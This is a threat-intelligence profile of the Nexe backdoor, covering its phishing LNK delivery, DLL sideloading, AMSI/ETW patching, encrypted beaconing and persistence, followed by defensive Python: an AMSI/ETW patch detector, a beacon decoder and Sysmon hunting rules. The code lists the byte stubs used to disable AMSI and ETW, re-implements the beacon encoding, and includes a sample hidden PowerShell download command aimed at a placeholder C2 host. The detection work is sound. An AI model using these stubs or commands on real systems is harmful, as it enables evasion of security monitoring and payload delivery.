Nexe (Backdoor) – Malware

March 2, 2025

Nexe

Type of Malware

Backdoor

Country of Origin

India

Targeted Countries

Bhutan
China

Date of Initial Activity

2024

Associated Groups

APT-C-09

Motivation

Cyberwarfare
Espionage

Attack Vectors

Phishing

Targeted Systems

Windows

Overview

Nexe is a backdoor attributed to the Patchwork APT group (tracked by some vendors as APT-C-09), which has long targeted government, defense, and diplomatic organizations across South and Southeast Asia. It was identified in an ongoing cyber espionage campaign and marks a shift in the group's tooling toward in-memory execution and active tampering with Windows security telemetry. Nexe is delivered through a malicious LNK file, usually sent by phishing email, that runs a PowerShell script. The script downloads a decoy PDF and a malicious DLL, then executes the DLL by sideloading it into a copy of a legitimate Windows binary. Once running, the backdoor patches the AMSI and Event Tracing for Windows (ETW) APIs in memory so that security tools relying on them stop receiving data, loads its final payload in memory, and collects system information for exfiltration to its command-and-control server.

Targets

Information
Individuals
Public Administration

How they operate

The infection begins with a malicious LNK file, typically delivered by phishing email and disguised as a PDF document. When the victim opens it, the LNK file runs a PowerShell script that downloads two files: an innocuous-looking PDF and a malicious DLL. The PDF is only a decoy. The DLL, which carries encrypted shellcode, is the core component of the attack.

To execute the DLL, the script uses DLL sideloading. It copies a legitimate Windows binary, WerFaultSecure.exe, into a directory it controls and places the malicious DLL beside it, so that when the copied binary starts it resolves and loads the attacker's library instead of the legitimate one. Because the host process is a signed Microsoft executable, the malicious code runs under a trusted name.

Once loaded, the DLL decrypts and executes the embedded shellcode. The shellcode's first job is to patch, in the process's own memory, the functions that security tooling depends on: AmsiScanBuffer and AmsiScanString in AMSI (the Antimalware Scan Interface) and EtwEventWrite in Event Tracing for Windows (ETW). With those entry points overwritten, AMSI-based content scanning and ETW telemetry from the process no longer reach security products, and the shellcode can load the final payload directly into memory, rather than dropping it to disk, without raising alerts.

The final payload harvests host information: the machine's public and private IP addresses, its MAC address, the backdoor's process ID, and the Windows version. The malware hashes this data, encrypts it with the Salsa20 stream cipher, Base64-encodes the ciphertext, and sends it to a hardcoded command-and-control domain in an HTTP request. The encryption and encoding keep the contents opaque to network monitoring that looks for plaintext indicators, so the hardcoded C2 domains are the most practical network indicator once they are known.

For persistence, Nexe creates a scheduled task that launches the copied WerFaultSecure.exe at regular intervals, so the sideloaded DLL is re-executed after a reboot. It also creates a mutex so that only one instance of the backdoor runs at a time.

Together, these techniques let Nexe collect and transmit sensitive data while retaining long-term access to compromised systems, and they illustrate why defenders need controls that watch process behaviour and memory integrity rather than relying on file-based detection alone.
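The AMSI and ETW patching described above is detectable because it changes the first bytes of an exported function inside the running process. The following is an added example, not code from the report or from the malware, of the integrity check a hunter or EDR performs: compare the entry bytes a process has in memory against the same export in the on-disk image and recognise the stubs attackers usually write there. All byte strings here are constructed (the reference prologues are illustrative, not dumps of any particular amsi.dll or ntdll.dll build); on a live Windows host the in-memory bytes would come from ReadProcessMemory on the target process and the on-disk bytes from parsing the export in the file.

```python
"""Integrity check for the user-mode functions Nexe patches: AmsiScanBuffer,
AmsiScanString (amsi.dll) and EtwEventWrite (ntdll.dll).

Added example. All prologue bytes below are constructed/illustrative."""
from dataclasses import dataclass

# Stubs attackers commonly write over a function entry so it returns at once:
# a bare RET, "return 0", or (the classic AmsiScanBuffer patch) "return
# E_INVALIDARG (0x80070057)", which makes the caller treat the scan as failed.
KNOWN_STUBS = [
    ("ret", b"\xc3"),
    ("xor eax,eax; ret", b"\x31\xc0\xc3"),
    ("xor eax,eax; ret (REX form)", b"\x48\x33\xc0\xc3"),
    ("mov eax,0x80070057; ret", b"\xb8\x57\x00\x07\x80\xc3"),
]
# Compare only the entry bytes: longer spans run into relocations and
# hot-patch padding and produce false positives.
PROLOGUE_LEN = 8


@dataclass
class Finding:
    module: str
    function: str
    verdict: str   # "clean" or "patched"
    detail: str


def check_function(module, function, on_disk, in_memory):
    """Compare the first PROLOGUE_LEN bytes of an export on disk and in memory."""
    disk, mem = on_disk[:PROLOGUE_LEN], in_memory[:PROLOGUE_LEN]
    if disk == mem:
        return Finding(module, function, "clean", "entry bytes match the on-disk image")
    # Test longer stubs first so a bare RET does not shadow a longer match.
    for label, stub in sorted(KNOWN_STUBS, key=lambda s: -len(s[1])):
        if mem.startswith(stub):
            return Finding(module, function, "patched", f"entry overwritten with '{label}'")
    return Finding(module, function, "patched",
                   f"entry bytes differ: disk={disk.hex()} mem={mem.hex()}")


def scan(snapshot):
    """snapshot: {(module, function): (on_disk_bytes, in_memory_bytes)}"""
    return [check_function(m, f, d, mem) for (m, f), (d, mem) in snapshot.items()]


# Constructed snapshot (illustrative bytes): AmsiScanBuffer and EtwEventWrite
# have been patched the way the report describes, AmsiScanString is intact.
AMSI_SCAN_BUFFER = bytes.fromhex("4c8bdc49895b0849896b10")
AMSI_SCAN_STRING = bytes.fromhex("4883ec48488b4424704533db")
ETW_EVENT_WRITE = bytes.fromhex("4883ec584c8bcc")
SNAPSHOT = {
    ("amsi.dll", "AmsiScanBuffer"): (AMSI_SCAN_BUFFER, b"\xb8\x57\x00\x07\x80\xc3" + AMSI_SCAN_BUFFER[6:]),
    ("amsi.dll", "AmsiScanString"): (AMSI_SCAN_STRING, AMSI_SCAN_STRING),
    ("ntdll.dll", "EtwEventWrite"): (ETW_EVENT_WRITE, b"\xc3" + ETW_EVENT_WRITE[1:]),
}


def patched_functions(snapshot=SNAPSHOT):
    """Names of exports whose entry bytes no longer match the on-disk image."""
    return sorted(f.function for f in scan(snapshot) if f.verdict == "patched")


if __name__ == "__main__":
    for f in scan(SNAPSHOT):
        print(f"{f.module}!{f.function}: {f.verdict} ({f.detail})")
```

A mismatch means "modified", not necessarily "malicious": some security products place their own inline hooks on these same exports, so the check is most useful when the expected hooks of your own tooling are whitelisted and any other modification is escalated.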
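The beacon format above (collect host fields, hash, Salsa20-encrypt, Base64-encode, send over HTTP) is what an analyst re-implements from the sample in order to decode captured C2 traffic. The following is an added example of that re-implementation, not the malware's own code, using a from-scratch Salsa20 so it runs without third-party packages. The report does not give the plaintext layout, the hash algorithm, or how the key and nonce are derived, so the following are assumptions: fields are serialised as sorted JSON, the hash is SHA-256 prepended to the plaintext as an integrity check, and the 32-byte key and 8-byte nonce are fixed placeholders (the real values must be recovered from the sample).

```python
"""Re-implementation of the Nexe-style beacon encoding (hash, Salsa20, Base64).

Added example, not the malware's code. Key, nonce, field layout and hash
choice are assumptions; the host data is constructed."""
import base64
import hashlib
import json
import struct

MASK = 0xFFFFFFFF
SIGMA = b"expand 32-byte k"          # Salsa20 constants for a 32-byte key


def rotl32(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def quarterround(s, a, b, c, d):
    """Salsa20 quarterround on state words a, b, c, d (in place)."""
    s[b] ^= rotl32((s[a] + s[d]) & MASK, 7)
    s[c] ^= rotl32((s[b] + s[a]) & MASK, 9)
    s[d] ^= rotl32((s[c] + s[b]) & MASK, 13)
    s[a] ^= rotl32((s[d] + s[c]) & MASK, 18)


def salsa20_core(words):
    """Salsa20/20 core: 10 double rounds over 16 words, then add the input."""
    x = list(words)
    for _ in range(10):
        # column round
        quarterround(x, 0, 4, 8, 12)
        quarterround(x, 5, 9, 13, 1)
        quarterround(x, 10, 14, 2, 6)
        quarterround(x, 15, 3, 7, 11)
        # row round
        quarterround(x, 0, 1, 2, 3)
        quarterround(x, 5, 6, 7, 4)
        quarterround(x, 10, 11, 8, 9)
        quarterround(x, 15, 12, 13, 14)
    return [(a + b) & MASK for a, b in zip(x, words)]


def salsa20_block(key, nonce, counter):
    """64-byte keystream block for a 32-byte key, 8-byte nonce, 64-bit counter."""
    k = struct.unpack("<8I", key)
    n = struct.unpack("<2I", nonce)
    c = struct.unpack("<4I", SIGMA)
    state = [c[0], k[0], k[1], k[2], k[3], c[1], n[0], n[1],
             counter & MASK, (counter >> 32) & MASK, c[2], k[4], k[5], k[6], k[7], c[3]]
    return struct.pack("<16I", *salsa20_core(state))


def salsa20_xor(key, nonce, data):
    """Stream-cipher XOR; the same call encrypts and decrypts."""
    out = bytearray()
    for i in range(0, len(data), 64):
        ks = salsa20_block(key, nonce, i // 64)
        out += bytes(a ^ b for a, b in zip(data[i:i + 64], ks))
    return bytes(out)


def build_beacon(info, key, nonce):
    """Malware side (as assumed): JSON -> SHA-256 || JSON -> Salsa20 -> Base64."""
    plaintext = json.dumps(info, sort_keys=True).encode()
    digest = hashlib.sha256(plaintext).digest()
    return base64.b64encode(salsa20_xor(key, nonce, digest + plaintext)).decode()


def decode_beacon(b64, key, nonce):
    """Analyst side: reverse the pipeline and verify the embedded hash."""
    raw = salsa20_xor(key, nonce, base64.b64decode(b64))
    digest, plaintext = raw[:32], raw[32:]
    if hashlib.sha256(plaintext).digest() != digest:
        raise ValueError("hash mismatch: wrong key/nonce or corrupted capture")
    return json.loads(plaintext)


# Placeholder key/nonce (assumption) and constructed host data (TEST-NET address).
KEY = bytes(range(32))
NONCE = bytes(8)
SAMPLE_INFO = {"public_ip": "203.0.113.7", "private_ip": "10.0.0.5",
               "mac": "00-11-22-33-44-55", "pid": 4120, "os": "Windows 10 Pro 19045"}

if __name__ == "__main__":
    beacon = build_beacon(SAMPLE_INFO, KEY, NONCE)
    print("POST body:", beacon)
    print("decoded:", decode_beacon(beacon, KEY, NONCE))
```

Two practical notes follow from the construction. First, Base64 of Salsa20 output is high-entropy and carries no plaintext strings, which is why signature-based inspection of the HTTP body fails and the hardcoded domains remain the usable network indicator. Second, a stream cipher with a fixed key and nonce reuses its keystream across beacons, so an analyst holding two captured bodies can XOR them to recover the XOR of the two plaintexts even before the key is recovered from the sample.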
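The delivery chain (Explorer launching PowerShell from the LNK, a copy of WerFaultSecure.exe running outside System32 and loading a DLL from its own directory) and the scheduled-task persistence each leave a distinct trace in endpoint telemetry. The following is an added hunting example, not code from the report, that runs those checks over Sysmon-style process-creation (Event ID 1) and image-load (Event ID 7) records and Windows Security scheduled-task-creation (Event ID 4698) records. The event records, drop directory, DLL filename and command line are constructed for the example; the report names neither the sideloaded DLL nor the download command.

```python
"""Hunting logic for the Nexe delivery and persistence chain.

Added example. Events below are constructed; field names follow Sysmon
(Image, ParentImage, CommandLine, ImageLoaded, UtcTime) and Security 4698
(TaskName, TaskContent) conventions, normalised into dicts."""
import ntpath
import re
import xml.etree.ElementTree as ET

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"
# Generic download idioms; the actual Nexe command line is not given in the report.
DOWNLOAD_RE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|net\.webclient", re.I)


def in_system_dir(path):
    return path.lower().startswith(SYSTEM_DIRS)


def basename(path):
    return ntpath.basename(path).lower()


def hunt(events):
    """Return (time, ATT&CK technique, description) for each suspicious record."""
    findings = []
    for e in events:
        eid = e["EventID"]
        if eid == 1:
            image = e["Image"]
            # Copy of the WER binary executed outside its home directory.
            if basename(image) == "werfaultsecure.exe" and not in_system_dir(image):
                findings.append((e["UtcTime"], "T1574.002",
                                 f"WerFaultSecure.exe launched from {ntpath.dirname(image)}"))
            # PowerShell child of Explorer (how a double-clicked LNK runs) that downloads content.
            if (basename(image) == "powershell.exe"
                    and basename(e.get("ParentImage", "")) == "explorer.exe"
                    and DOWNLOAD_RE.search(e.get("CommandLine", ""))):
                findings.append((e["UtcTime"], "T1059.001",
                                 "PowerShell spawned by Explorer with download cmdlet: " + e["CommandLine"]))
        elif eid == 7:
            image, loaded = e["Image"], e["ImageLoaded"]
            # WerFaultSecure.exe loading a DLL from its own non-system directory: sideload.
            if (basename(image) == "werfaultsecure.exe" and loaded.lower().endswith(".dll")
                    and not in_system_dir(loaded)
                    and ntpath.dirname(loaded).lower() == ntpath.dirname(image).lower()):
                findings.append((e["UtcTime"], "T1574.002", f"{basename(loaded)} sideloaded into {image}"))
        elif eid == 4698:
            # Scheduled task whose action is the relocated WerFaultSecure.exe.
            root = ET.fromstring(e["TaskContent"])
            for cmd in root.iter(TASK_NS + "Command"):
                if basename(cmd.text) == "werfaultsecure.exe" and not in_system_dir(cmd.text):
                    findings.append((e["UtcTime"], "T1053.005",
                                     f"scheduled task {e['TaskName']} runs {cmd.text}"))
    return findings


# Constructed sample telemetry. DROP and "wer.dll" are hypothetical names.
DROP = "C:\\Users\\Public\\Libraries\\"
TASK_XML = f"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger><Repetition><Interval>PT30M</Interval></Repetition></TimeTrigger></Triggers>
  <Actions><Exec><Command>{DROP}WerFaultSecure.exe</Command></Exec></Actions>
</Task>"""
EVENTS = [
    {"EventID": 1, "UtcTime": "2024-11-04 09:12:01",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell.exe -w hidden -c \"(New-Object Net.WebClient).DownloadFile("
                    "'http://c2.example.invalid/doc.pdf','C:\\Users\\Public\\doc.pdf')\""},
    {"EventID": 1, "UtcTime": "2024-11-04 09:12:04", "Image": DROP + "WerFaultSecure.exe",
     "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": DROP + "WerFaultSecure.exe"},
    {"EventID": 7, "UtcTime": "2024-11-04 09:12:04", "Image": DROP + "WerFaultSecure.exe",
     "ImageLoaded": DROP + "wer.dll"},
    # Benign load by the same process: must not fire.
    {"EventID": 7, "UtcTime": "2024-11-04 09:12:04", "Image": DROP + "WerFaultSecure.exe",
     "ImageLoaded": "C:\\Windows\\System32\\kernel32.dll"},
    # Legitimate WER invocation from System32: must not fire.
    {"EventID": 1, "UtcTime": "2024-11-04 09:15:00", "Image": "C:\\Windows\\System32\\WerFaultSecure.exe",
     "ParentImage": "C:\\Windows\\System32\\svchost.exe", "CommandLine": "WerFaultSecure.exe -s -p 1234"},
    {"EventID": 4698, "UtcTime": "2024-11-04 09:12:05",
     "TaskName": "\\Microsoft\\Windows\\WER\\Update", "TaskContent": TASK_XML},
]

if __name__ == "__main__":
    for when, technique, what in hunt(EVENTS):
        print(when, technique, what)
```

The two WerFaultSecure.exe rules are the high-fidelity ones: the legitimate binary lives only in System32 and is started by the WER service, so any copy elsewhere, or any DLL it loads from a user-writable directory, is worth an alert on its own. The PowerShell rule is a broad heuristic and belongs in a hunting query rather than a paging alert.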
References:
  • Nexe Backdoor Unleashed: Patchwork APT Group’s Sophisticated Evasion of Defenses
Tags: APT, APT-C-09, Asia, Backdoors, Bhutan, China, Cyberwarfare, India, Malware, Nexe, Patchwork, Phishing, PowerShell, Windows
    © 2025 | CyberMaterial | All rights reserved
